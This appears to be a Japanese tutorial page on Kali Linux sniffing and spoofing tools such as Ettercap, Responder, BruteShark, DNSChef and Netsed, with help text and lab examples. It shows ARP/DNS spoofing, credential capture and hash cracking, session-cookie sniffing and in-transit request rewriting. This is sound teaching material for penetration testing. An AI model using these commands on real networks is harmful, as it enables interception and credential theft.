[INFO] (PID:5479) throughput: 95373.69 packets/second.
Network Sniffing and Spoofing
Above
ネットワークに流れるパケットのプロトコルを判別して情報を表示します。
[対応プロトコル]
MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
VLAN (802.1Q)
S7COMM (Siemens) (SCADA)
OMRON (SCADA)
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP (SCADA)
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
SNMP (Simple Network Management Protocol)
RADIUS (Remote Authentication Dial-In User Service)
■ 使用方法
root@kali:~# above --help
usage: above [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]
[--search-vlan]
options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, default: not set
--output OUTPUT File name where the traffic will be recorded, default: not set
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)
--search-vlan VLAN Search
■ 使用例
# ネットワークインターフェース eth0 に流れるパケットを120秒間キャプチャする
root@kali:~# above --interface eth0 --timer 120
[...]
-----------------------------------------------------------------------------------------
[+] Start sniffing...
[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SNMP Packet
[*] Attack Impact: Information Gathering
[*] Tools: snmpwalk, snmpget, snmp_enum, onesixtyone
[*] Source IP: 192.168.X.X
[*] Destination IP: 192.168.X.X
[*] SNMP Community String: public
[*] Mitigation: Restrict SNMP access, use strong community strings, monitor SNMP traffic
BruteShark
キャプチャしたパケットの調査・分析を行います。パスワードの抽出、ネットワークマップの構築、TCPセッションの再構築、暗号化されたパスワードのハッシュの抽出などを行うことが出来ます。
■ 使用方法
root@kali:~# brutesharkcli --help
-d, --input-dir The input directory containing the files to be processed.
-i, --input The files to be processed separated by comma.
-m, --modules The modules to be separated by comma: Credentials, FileExtracting, NetworkMap, DNS, Voip.
-o, --output Output directory for the results files.
-p, --promiscuous Configures whether to start live capture with promiscuous mode (sometimes needs super user privileges to do so),use along with -l for live
capture.
-l, --live-capture Capture and process packets live from a network interface.
-f, --filter Set a capture BPF filter to the live traffic processing.
--help Display this help screen.
--version Display version information.
■ 使用例
# ネットワークをスニッフィングしてクレデンシャル情報(Kerberos, NTLM, CRAM-MD5, HTTP-Digestなど)を取得する
root@kali:~# brutesharkcli -l eth0 -m Credentials -o /root
[+] Started analyzing packets from eth0 device - Press Ctrl + C to stop
# Digest認証のハッシュを検出
Found: Hash: 2001:db8::2=>2001:db8::3 (HTTP) HTTP-Digest => 1ffa22ed90f32080df6dff3f1796e117
^C
Hashes file created: /root/Hashes/Brute Shark - HTTP-Digest Hashcat Export.txt
[+] Successfully exported hashes
[+] BruteShark finished processing
# エクスポートされたファイルをHashcatで解析
root@kali:~# hashcat -a 3 "/root/Hashes/Brute Shark - HTTP-Digest Hashcat Export.txt"
hashcat (v6.2.6) starting in autodetect mode
[...]
# ハッシュ化されたパスワードを解読
$sip$***admin*Digest Auth*GET**/**h5iIF2AiBgA=e6e78c5e7ac1d1104bc8c104e529ff0af46565d8*ZmZlZmQxZmRhY2EyNDg1ZWRmNTgzY2I1ZDQ1NzczNTE=*00000001*auth*MD5*1ffa22ed90f32080df6dff3f1796e117:pass
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 11400 (SIP digest authentication (MD5))
Hash.Target......: $sip$***admin*Digest Auth*GET**/**h5iIF2AiBgA=e6e78...96e117
Time.Started.....: Wed Sep 18 09:13:29 2024 (0 secs)
Time.Estimated...: Wed Sep 18 09:13:29 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?1?2?2?2 [4]
Guess.Charset....: -1 ?l?d?u, -2 ?l?d, -3 ?l?d*!$@_, -4 Undefined
Guess.Queue......: 4/15 (26.67%)
Speed.#1.........: 39098.6 kH/s (4.07ms) @ Accel:512 Loops:62 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 253952/2892672 (8.78%)
Rejected.........: 0/253952 (0.00%)
Restore.Point....: 0/46656 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-62 Iteration:0-62
Candidate.Engine.: Device Generator
Candidates.#1....: sari -> Xbbi
Windows版ではGUIによる操作も可能です。
Chaosreader
ネットワークトラフィックログ内のキャプチャデータを分析し、様々なアプリケーションプロトコル(HTTP/FTP/...)のセッションとファイルのデータをレポートに出力します。
■ 使用方法
root@kali:~# chaosreader --help
USAGE: chaosreader [-adehiknqrvxAHIRTUXY] [-D dir]
[-b port[,...]] [-B port[,...]]
[-j IPaddr[,...]] [-J IPaddr[,...]]
[-l port[,...]] [-L port[,...]] [-m bytes[k]]
[-M bytes[k]] [-o "time"|"size"|"type"|"ip"]
[-p port[,...]] [-P port[,...]]
infile [infile2 ...]
chaosreader -s [mins] | -S [mins[,count]]
[-z] [-f 'filter']
chaosreader # Create application session files, indexes
-a, --application # Create application session files (default)
-d, --preferdns # Show DNS names instead of IP addresses
-e, --everything # Create HTML 2-way & hex files for everything
-h # Print a brief help
--help # Print verbose help (this) and version
--help2 # Print massive help
-i, --info # Create info file
-q, --quiet # Quiet, no output to screen
-r, --raw # Create raw files
-v, --verbose # Verbose - Create ALL files .. (except -e)
-x, --index # Create index files (default)
-A, --noapplication # Exclude application session files
-H, --hex # Include hex dumps (slow)
-I, --noinfo # Exclude info files
-R, --noraw # Exclude raw files
-T, --notcp # Exclude TCP traffic
-U, --noudp # Exclude UDP traffic
-Y, --noicmp # Exclude ICMP traffic
-X, --noindex # Exclude index files
-k, --keydata # Create extra files for keystroke analysis
-n, --names # Include hostnames in hyperlinked HTTPlog (HTML)
-D dir --dir dir # Output all files to this directory
-b 25,79 --playtcp 25,79 # replay these TCP ports as well (playback)
-B 36,42 --playudp 36,42 # replay these UDP ports as well (playback)
-l 7,79 --htmltcp 7,79 # Create HTML for these TCP ports as well
-L 7,123 --htmludp 7,123 # Create HTML for these UDP ports as well
-m 1k --min 1k # Min size of connection to save ("k" for Kb)
-M 1024k --max 1k # Max size of connection to save ("k" for Kb)
-o size --sort size # sort Order: time/size/type/ip (Default time)
-p 21,23 --port 21,23 # Only examine these ports (TCP & UDP)
-P 80,81 --noport 80,81 # Exclude these ports (TCP & UDP)
-s 5 --runonce 5 # Standalone. Run tcpdump/snoop for 5 mins.
-S 5,10 --runmany 5,10 # Standalone, many. 10 samples of 5 mins each.
-S 5 --runmany 5 # Standalone, endless. 5 min samples forever.
-z --runredo # Standalone, redo. Rereads last run's logs.
-j 10.1.2.1 --ipaddr 10.1.2.1 # Only examine these IPs
-J 10.1.2.1 --noipaddr 10.1.2.1 # Exclude these IPs
-f 'port 7' --filter 'port 7' # With standalone, use this dump filter.
■ 使用例
root@kali:~# chaosreader -D report out.pcap
Opening, out.pcap
Reading file contents,
100% (108476/108476)
Reassembling packets,
100% (868/868)
index.html created.
出力されたHTMLレポート
darkstat
ネットワークインターフェースを流れるパケットを監視してトラフィックのグラフや統計情報を表示します。
■ 使用方法
root@kali:~# darkstat --help
usage: darkstat [ -i interface ]
[ -f filter ]
[ -r capfile ]
[ -p port ]
[ -b bindaddr ]
[ -l network/netmask ]
[ --base path ]
[ --local-only ]
[ --snaplen bytes ]
[ --pppoe ]
[ --syslog ]
[ --verbose ]
[ --no-daemon ]
[ --no-promisc ]
[ --no-dns ]
[ --no-macs ]
[ --no-lastseen ]
[ --chroot dir ]
[ --user username ]
[ --daylog filename ]
[ --import filename ]
[ --export filename ]
[ --pidfile filename ]
[ --hosts-max count ]
[ --hosts-keep count ]
[ --ports-max count ]
[ --ports-keep count ]
[ --highest-port port ]
[ --wait secs ]
[ --hexdump ]
[ --version ]
[ --help ]
■ 使用例
# ネットワークインターフェースeth0を監視
root@kali:~# darkstat -i eth0
667番ポートでWebサーバが起動するのでブラウザから確認可能
DNSChef
DNS偽装サーバー(DNSプロキシ)の機能を提供します。
■ 使用方法
root@kali:~# dnschef --help
usage: dnschef [options]:
options:
-h, --help show this help message and exit
--fakedomains thesprawl.org,google.com
A comma separated list of domain names which will be resolved to FAKE values specified in the the above parameters. All other domain names
will be resolved to their true values.
--truedomains thesprawl.org,google.com
A comma separated list of domain names which will be resolved to their TRUE values. All other domain names will be resolved to fake values
specified in the above parameters.
Fake DNS records::
--fakeip 192.0.2.1 IP address to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'A' queries will be
spoofed. Consider using --file argument if you need to define more than one IP address.
--fakeipv6 2001:db8::1
IPv6 address to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'AAAA' queries will be
spoofed. Consider using --file argument if you need to define more than one IPv6 address.
--fakemail mail.fake.com
MX name to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'MX' queries will be spoofed.
Consider using --file argument if you need to define more than one MX record.
--fakealias www.fake.com
CNAME name to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'CNAME' queries will be
spoofed. Consider using --file argument if you need to define more than one CNAME record.
--fakens ns.fake.com NS name to use for matching DNS queries. If you use this parameter without specifying domain names, then all 'NS' queries will be spoofed.
Consider using --file argument if you need to define more than one NS record.
--file FILE Specify a file containing a list of DOMAIN=IP pairs (one pair per line) used for DNS responses. For example: google.com=1.1.1.1 will force
all queries to 'google.com' to be resolved to '1.1.1.1'. IPv6 addresses will be automatically detected. You can be even more specific by
combining --file with other arguments. However, data obtained from the file will take precedence over others.
Optional runtime parameters.:
--logfile FILE Specify a log file to record all activity
--nameservers 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
A comma separated list of alternative DNS servers to use with proxied requests. Nameservers can have either IP or IP#PORT format. A
randomly selected server from the list will be used for proxy requests when provided with multiple servers. By default, the tool uses
Google\'s public DNS server 8.8.8.8 when running in IPv4 mode and 2001:4860:4860::8888 when running in IPv6 mode.
-i 127.0.0.1 or ::1, --interface 127.0.0.1 or ::1
Define an interface to use for the DNS listener. By default, the tool uses 127.0.0.1 for IPv4 mode and ::1 for IPv6 mode.
-t, --tcp Use TCP DNS proxy instead of the default UDP.
-6, --ipv6 Run in IPv6 mode.
-p 53, --port 53 Port number to listen for DNS requests.
-q, --quiet Don\'t show headers.
■ 使用例
# DNSプロキシを起動
root@kali:~# dnschef --fakeip 127.0.0.1 --fakeipv6 2001:db8::1
[...]
(07:04:40) [*] DNSChef started on interface: 127.0.0.1
(07:04:40) [*] Using the following nameservers: 8.8.8.8
(07:04:40) [*] Cooking all A replies to point to 127.0.0.1
(07:04:40) [*] Cooking all AAAA replies to point to 2001:db8::1
# DNSプロキシに問い合わせを実行(事前に`/etc/resolv.conf`に`nameserver 127.0.0.1`を追加)
root@kali:~# nslookup google.com
Server: 127.0.0.1
Address: 127.0.0.1#53
Name: google.com
Address: 127.0.0.1
Name: google.com
Address: 2001:db8::1
Ettercap
中間者攻撃を行うための様々な機能を提供します。
■ 使用方法
root@kali:~# ettercap --help
Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]
TARGET is in the format MAC/IP/IPv6/PORTs (see the man for further detail)
Sniffing and Attack options:
-M, --mitm <METHOD:ARGS> perform a mitm attack
-o, --only-mitm don\'t sniff, only perform the mitm attack
-b, --broadcast sniff packets destined to broadcast
-B, --bridge <IFACE> use bridged sniff (needs 2 ifaces)
-p, --nopromisc do not put the iface in promisc mode
-S, --nosslmitm do not forge SSL certificates
-u, --unoffensive do not forward packets
-r, --read <file> read data from pcapfile <file>
-f, --pcapfilter <string> set the pcap filter <string>
-R, --reversed use reversed TARGET matching
-t, --proto <proto> sniff only this proto (default is all)
--certificate <file> certificate file to use for SSL MiTM
--private-key <file> private key file to use for SSL MiTM
User Interface Type:
-T, --text use text only GUI
-q, --quiet do not display packet contents
-s, --script <CMD> issue these commands to the GUI
-C, --curses use curses GUI
-D, --daemon daemonize ettercap (no GUI)
-G, --gtk use GTK+ GUI
Logging options:
-w, --write <file> write sniffed data to pcapfile <file>
-L, --log <logfile> log all the traffic to this <logfile>
-l, --log-info <logfile> log only passive infos to this <logfile>
-m, --log-msg <logfile> log all the messages to this <logfile>
-c, --compress use gzip compression on log files
Visualization options:
-d, --dns resolves ip addresses into hostnames
-V, --visual <format> set the visualization format
-e, --regex <regex> visualize only packets matching this regex
-E, --ext-headers print extended header for every pck
-Q, --superquiet do not display user and password
LUA options:
--lua-script <script1>,[<script2>,...] comma-separted list of LUA scripts
--lua-args n1=v1,[n2=v2,...] comma-separated arguments to LUA script(s)
General options:
-i, --iface <iface> use this network interface
-I, --liface show all the network interfaces
-Y, --secondary <ifaces> list of secondary network interfaces
-n, --netmask <netmask> force this <netmask> on iface
-A, --address <address> force this local <address> on iface
-P, --plugin <plugin> launch this <plugin> - multiple occurance allowed
--plugin-list <plugin1>,[<plugin2>,...] comma-separated list of plugins
-F, --filter <file> load the filter <file> (content filter)
-z, --silent do not perform the initial ARP scan
-6, --ip6scan send ICMPv6 probes to discover IPv6 nodes on the link
-j, --load-hosts <file> load the hosts list from <file>
-k, --save-hosts <file> save the hosts list to <file>
-W, --wifi-key <wkey> use this key to decrypt wifi packets (wep or wpa)
-a, --config <config> use the alternative config file <config>
Standard options:
-v, --version prints the version and exit
-h, --help this help screen
■ 使用例
# google.comのAレコードを攻撃者ホストのIPアドレスに変更
root@kali_1:~# echo "google.com A 192.168.11.3" >> /etc/ettercap/etter.dns
# 標的ホストに対してDNSスプーフィングを実行
root@kali_1:~# ettercap -T -i eth0 -P dns_spoof -M arp:remote /192.168.11.1// /192.168.11.4//
ettercap 0.8.3.1 copyright 2001-2020 Ettercap Development Team
Listening on:
eth0 -> 02:42:AC:13:00:02
192.168.11.4/255.255.0.0
[...]
# 標的ホストでgoogle.comへのリクエスト(攻撃者ホストに立てたWebサーバーにリクエストされる)
root@kali_2:~# curl -L --head http://google.com
HTTP/1.1 200 OK
Date: Wed, 02 Oct 2024 03:36:29 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.1.31
Content-Type: text/html; charset=UTF-8
HexInject
パケットのスニッフィングやインジェクションを16進数で行います。
■ 使用方法
root@kali:~# hexinject -h
Usage:
hexinject <mode> <options>
Options:
-s sniff mode
-p inject mode
-r raw mode (instead of the default hexadecimal mode)
-f <filter> custom pcap filter
-i <device> network device to use
-F <file> pcap file to use as device (sniff mode only)
-c <count> number of packets to capture
-t <time> sleep time in microseconds (default 100)
-I list all available network devices
Injection options:
-C disable automatic packet checksum
-S disable automatic packet size fields
Interface options:
-P disable promiscuous mode
-M put the wireless interface in monitor mode
(experimental: use airmon-ng instead of this...)
Other options:
-h help screen
■ 使用例
# ARPパケットをスニッフィング(16進数モード)してIPアドレスを抽出
root@kali:~# hexinject -s -i eth0 -f 'arp' | awk -W interactive '{ printf("%d.%d.%d.%d\n", "0x"$29, "0x"$30, "0x"$31, "0x"$32); }'
# スニッフィング状態でARPテーブルを表示
root@kali:~# arp
# IPアドレスが表示される
root@kali:~# hexinject -s -i eth0 -f 'arp' | awk -W interactive '{ printf("%d.%d.%d.%d\n", "0x"$29, "0x"$30, "0x"$31, "0x"$32); }'
192.168.11.1
192.168.11.3
192.168.11.3
192.168.11.1
---------------------
# パケットをスニッフィング(rawモード)してHTTP通信のHostヘッダーを抽出
root@kali:~# hexinject -s -i eth0 -r | stdbuf -o0 strings | grep 'Host:'
# スニッフィング状態でhttpリクエストを送信
root@kali:~# curl -H 'Host: example.com' http://example.com/
root@kali:~# curl -L -H 'Host: google.com' https://google.com/
# Hostヘッダーの情報が表示される
root@kali:~# hexinject -s -i eth0 -r | stdbuf -o0 strings | grep 'Host:'
Host: example.com
Host: google.com
Host: www.google.com
GNU MAC Changer
ネットワークインターフェイスのMACアドレスを変更します。
■ 使用方法
root@kali:~# macchanger --help
GNU MAC Changer
Usage: macchanger [options] device
-h, --help Print this help
-V, --version Print version and exit
-s, --show Print the MAC address and exit
-e, --ending Don\'t change the vendor bytes
-a, --another Set random vendor MAC of the same kind
-A Set random vendor MAC of any kind
-p, --permanent Reset to original, permanent hardware MAC
-r, --random Set fully random MAC
-l, --list[=keyword] Print known vendors
-b, --bia Pretend to be a burned-in-address
-m, --mac=XX:XX:XX:XX:XX:XX
--mac XX:XX:XX:XX:XX:XX Set the MAC XX:XX:XX:XX:XX:XX
■ 使用例
root@kali:~# ip link show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
link/ether 96:00:02:ae:08:aa brd ff:ff:ff:ff:ff:ff link-netnsid 0
root@kali:~# macchanger -e eth0
Current MAC: 96:00:02:ae:08:aa (unknown)
Permanent MAC: 96:00:02:ae:08:aa (unknown)
New MAC: 94:00:02:e0:66:95 (unknown)
root@kali:~# ip link show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
link/ether 94:00:02:e0:66:95 brd ff:ff:ff:ff:ff:ff link-netnsid 0
Netsed
ネットワークを介して転送されるパケットの内容をリアルタイムで変更します。
■ 使用方法
root@kali:~# netsed --help
Usage: netsed [option] proto lport rhost rport rule1 [ rule2 ... ]
options - can be --ipv4 or -4 to force address resolution in IPv4,
--ipv6 or -6 to force address resolution in IPv6,
--ipany to resolve the address in either IPv4 or IPv6.
- --help or -h to display this usage information.
proto - protocol specification (tcp or udp)
lport - local port to listen on (see README for transparent
traffic intercepting on some systems)
rhost - where connection should be forwarded (0 = use destination
address of incoming connection, see README)
rport - destination port (0 = dst port of incoming connection)
ruleN - replacement rules (see below)
General syntax of replacement rules: s/pat1/pat2[/expire]
■ 使用例
# ホストAで8080番ポートを使ってパケットを待ち受ける
root@kali_a:~# ncat -l 8080 --keep-open
# ホストBからホストAに対してHTTPリクエストを送信
root@kali_b:~# curl http://192.168.11.4:8080
# ホストAにリクエストの内容が表示される
root@kali_a:~# ncat -l 8080 --keep-open
GET / HTTP/1.1
Host: 192.168.11.4:8080
User-Agent: curl/8.9.1
Accept: */*
# ホストCで8080番ポートを使ってTCPパケットを待ち受け、HTTPヘッダーを書き換えてホストAに転送する
root@kali_c:~# netsed tcp 8080 192.168.11.4 8080 's/GET %2f HTTP%2f1.1/DELETE %2f HTTP%2f1.1/' 's/Host: 192.168.11.3/Host: 192.168.11.4/'
netsed 1.2 by Julien VdG <julien@silicone.homelinux.org>
based on 0.01c from Michal Zalewski <lcamtuf@ids.pl>
[*] Parsing rule s/GET %2f HTTP%2f1.1/DELETE %2f HTTP%2f1.1/...
[*] Parsing rule s/Host: 192.168.11.3/Host: 192.168.11.4/...
[+] Loaded 2 rules...
[+] Using fixed forwarding to 192.168.11.4,8080.
[+] Listening on port 8080/tcp.
# ホストBからホストCに対してHTTPリクエストを送信
root@kali_b:~# curl http://192.168.11.3:8080
# ホストAにホストCで書き換えられた内容が表示される
root@kali_a:~# ncat -l 8080 --keep-open
GET / HTTP/1.1
Host: 192.168.11.4:8080
User-Agent: curl/8.9.1
Accept: */*
DELETE / HTTP/1.1
Host: 192.168.11.4:8080
User-Agent: curl/8.9.1
Accept: */*
ngrep
パケットの解析を行います。パケットのデータペイロードに対する正規表現または16進表現によるマッチングや、BPFフィルタロジックを指定することができます。
■ 使用方法
root@kali:~# ngrep -h
usage: ngrep <-hNXViwqpevxlDtTRM> <-IO pcap_dump> <-n num> <-d dev> <-A num>
<-s snaplen> <-S limitlen> <-W normal|byline|single|none> <-c cols>
<-P char> <-F file> <-K count>
<match expression> <bpf filter>
-h is help/usage
-V is version information
-q is be quiet (don\'t print packet reception hash marks)
-e is show empty packets
-i is ignore case
-v is invert match
-R is don\'t do privilege revocation logic
-x is print in alternate hexdump format
-X is interpret match expression as hexadecimal
-w is word-regex (expression must match as a word)
-p is don\'t go into promiscuous mode
-l is make stdout line buffered
-D is replay pcap_dumps with their recorded time intervals
-t is print timestamp every time a packet is matched
-T is print delta timestamp every time a packet is matched
specify twice for delta from first match
-M is don\'t do multi-line match (do single-line match instead)
-I is read packet stream from pcap format file pcap_dump
-O is dump matched packets in pcap format to pcap_dump
-n is look at only num packets
-A is dump num packets after a match
-s is set the bpf caplen
-S is set the limitlen on matched packets
-W is set the dump format (normal, byline, single, none)
-c is force the column width to the specified size
-P is set the non-printable display char to what is specified
-F is read the bpf filter from the specified file
-N is show sub protocol number
-d is use specified device instead of the pcap default
-K is send N packets to kill observed connections
■ 使用例
# ポート番号80番向けで"PHPSESSID"という内容が含まれる通信をスニッフィング
root@kali:~# ngrep -d eth0 -t 'PHPSESSID' tcp and dst port 80
interface: eth0 (192.168.11.0/255.255.255.0)
filter: ( tcp and dst port 80 ) and ((ip || ip6) || (vlan && (ip || ip6)))
match (JIT): PHPSESSID
# 条件にマッチした通信が表示される
T 2024/10/30 03:09:29.287955 192.168.11.3:32974 -> 192.168.11.4:80 [AP] #5
GET /login.php HTTP/1.1..Host: 192.168.11.4..User-Agent: curl/8.9.1..Accept: */*..Cookie: PHPSESSID=07339191351e517568d7486c2220c62a....
# パケットのダンプファイルを検索して条件にマッチする通信を表示
root@kali:~# ngrep -I dump.pcap 'PHPSESSID' tcp and dst port 80
input: dump.pcap
filter: ( tcp and dst port 80 ) and ((ip || ip6) || (vlan && (ip || ip6)))
match (JIT): PHPSESSID
##########
T 192.168.11.3:45448 -> 192.168.11.4:80 [AP] #12
GET /login.php HTTP/1.1..Host: 192.168.11.4..User-Agent: curl/8.9.1..Accept: */*..Cookie: PHPSESSID=07339191351e517568d7486c2220c62a....
###exit
P0f
受信したトラフィックをフィンガープリントを使って解析し、送信元のOS情報などを表示します。
■ 使用方法
root@kali:~# p0f -h
Usage: p0f [ ...options... ] [ 'filter rule' ]
Network interface options:
-i iface - listen on the specified network interface
-r file - read offline pcap data from a given file
-p - put the listening interface in promiscuous mode
-L - list all available interfaces
Operating mode and output settings:
-f file - read fingerprint database from 'file' (/etc/p0f/p0f.fp)
-o file - write information to the specified log file
-s name - answer to API queries at a named unix socket
-u user - switch to the specified unprivileged account and chroot
-d - fork into background (requires -o or -s)
Performance-related options:
-S limit - limit number of parallel API connections (20)
-t c,h - set connection / host cache age limits (30s,120m)
-m c,h - cap the number of active connections / hosts (1000,10000)
■ 使用例
root@kali:~# p0f -i eth0 'dst port 80'
[+] Closed 1 file descriptor.
[+] Loaded 322 signatures from '/etc/p0f/p0f.fp'.
[+] Intercepting traffic on interface 'eth0'.
[+] Custom filtering rule enabled: dst port 80 [+VLAN]
[+] Entered main event loop.
.-[ 192.168.11.4/49186 -> 192.168.11.3/80 (syn) ]-
|
| client = 192.168.11.4/49186
| os = Linux 2.2.x-3.x
| dist = 0
| params = generic
| raw_sig = 4:64+0:0:1460:mss*44,7:mss,sok,ts,nop,ws:df,id+:0
|
`----
.-[ 192.168.11.4/49186 -> 192.168.11.3/80 (mtu) ]-
|
| client = 192.168.11.4/49186
| link = Ethernet or modem
| raw_mtu = 1500
|
`----
[...]
Portspoof
攻撃者のポートスキャンに対して偽装した結果を返すなどし、実行されているサービスの特定を可能な限り阻害します。
■ 使用方法
root@kali:~# portspoof -h
Usage: portspoof [OPTION]...
-i ip : Bind to a particular IP address
-p port : Bind to a particular PORT number
-s file_path : Portspoof service signature regex. file
-c file_path : Portspoof configuration file
-l file_path : Log port scanning alerts to a file
-f file_path : FUZZER_MODE - fuzzing payload file list
-n file_path : FUZZER_MODE - wrapping signatures file list
-1 FUZZER_MODE - generate fuzzing payloads internally
-2 switch to simple reply mode (doesn\'t work for Nmap)!
-D run as daemon process
-d disable syslog
-v be verbose
-h display this help and exit
■ 使用例
# portspoof起動前の標的に対するポートスキャン結果(SSHサーバーだけ稼働している)
root@kali_attacker:~# nmap -sV --top-ports 20 192.168.11.4
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 9.9p1 Debian 2 (protocol 2.0)
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp closed http
110/tcp closed pop3
111/tcp closed rpcbind
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
443/tcp closed https
445/tcp closed microsoft-ds
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
# 標的側ホスト
# 22番ポート(SSH)以外のTCP接続を4444番ポートへリダイレクト
root@kali_target:~# iptables -t nat -A PREROUTING -p tcp -m multiport --dports 1:21,23:65535 -j REDIRECT --to-ports 4444
# portspoofを起動(ポート番号を指定しない場合は4444番ポートが使用される)
root@kali_target:~# portspoof -s /etc/portspoof/portspoof_signatures
-> Using user defined signature file /etc/portspoof/portspoof_signatures
# portspoof起動後の標的に対するポートスキャン結果
root@kali_attacker:~# nmap -sV --top-ports 20 192.168.11.4
# 偽装したサービス署名をランダムで返却しているので適当なソフトウェア名が表示される
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 9.9p1 Debian 2 (protocol 2.0)
23/tcp open telnet?
25/tcp open mogilefs MogileFS distributed filesystem
53/tcp open domain?
80/tcp open telnet InterSystems CTELNETD
110/tcp open pop3?
111/tcp open ssh (protocol 91)
135/tcp open jrpgt JRPGT game server
139/tcp open netbios-ssn?
143/tcp open telnet Lantronix MSS100 serial interface telnetd 0
443/tcp open sip Microsoft Office Communications Service 2005
445/tcp open http X10 ActivePhone remote control httpd uKMjuI
993/tcp open telnet Huawei Access Runner ADSL telnetd
995/tcp open pop3s?
1723/tcp open ftp Medusa Async ftpd 11Y >.
3306/tcp open http Aladdin HASP license manager 460156
3389/tcp open http NetXMS httpd
5900/tcp open irc IRCnet-based ircd
8080/tcp open ftp HP166XC KrD Logic Analyzer ftpd (FUSION ftpd ZeIENwC)
7 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Responder
NTLMv1/NTLMv2/LMv2、NTLMSSP、Basic HTTP認証をサポートするHTTP/SMB/MSSQL/FTP/LDAP不正認証サーバーを内蔵し、LLMNR/NBT-NS/mDNSスプーフィングを行います。
■ 使用方法
root@kali:~# responder --help
Usage: responder -I eth0 -w -d
or:
responder -I eth0 -wd
Options:
--version show program\'s version number and exit
-h, --help show this help message and exit
-A, --analyze Analyze mode. This option allows you to see NBT-NS,
BROWSER, LLMNR requests without responding.
-I eth0, --interface=eth0
Network interface to use, you can use 'ALL' as a
wildcard for all interfaces
-i 10.0.0.21, --ip=10.0.0.21
Local IP to use (only for OSX)
-6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
Poison all requests with another IPv6 address than
Responder\'s one.
-e 10.0.0.22, --externalip=10.0.0.22
Poison all requests with another IP address than
Responder\'s one.
-b, --basic Return a Basic HTTP authentication. Default: NTLM
-d, --DHCP Enable answers for DHCP broadcast requests. This
option will inject a WPAD server in the DHCP response.
Default: False
-D, --DHCP-DNS This option will inject a DNS server in the DHCP
response, otherwise a WPAD server will be added.
Default: False
-w, --wpad Start the WPAD rogue proxy server. Default value is
False
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
Upstream HTTP proxy used by the rogue WPAD Proxy for
outgoing requests (format: host:port)
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
retrieval. This may cause a login prompt. Default:
False
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
authentication for the proxy. WPAD doesn\'t need to be
ON. This option is highly effective. Default: False
-Q, --quiet Tell Responder to be quiet, disables a bunch of
printing from the poisoners. Default: False
--lm Force LM hashing downgrade for Windows XP/2003 and
earlier. Default: False
--disable-ess Force ESS downgrade. Default: False
-v, --verbose Increase verbosity.
-t 1e, --ttl=1e Change the default Windows TTL for poisoned answers.
Value in hex (30 seconds = 1e). use '-t random' for
random TTL
■ 使用例
# Responderを起動
root@kali:~# responder -I eth0 -w -Q
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[...]
[+] Listening for events...
[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.
Windowsクライアントのエクスプローラーで適当なネットワーク共有フォルダを入力すると資格情報を求められるので入力
# ログにユーザーが入力した資格情報が記録される
root@kali:~# cat /usr/share/responder/logs/SMB-NTLMv2-SSP-2400:4152:4321:9c10:10da:bc40:5cbe:148d.txt | grep hello
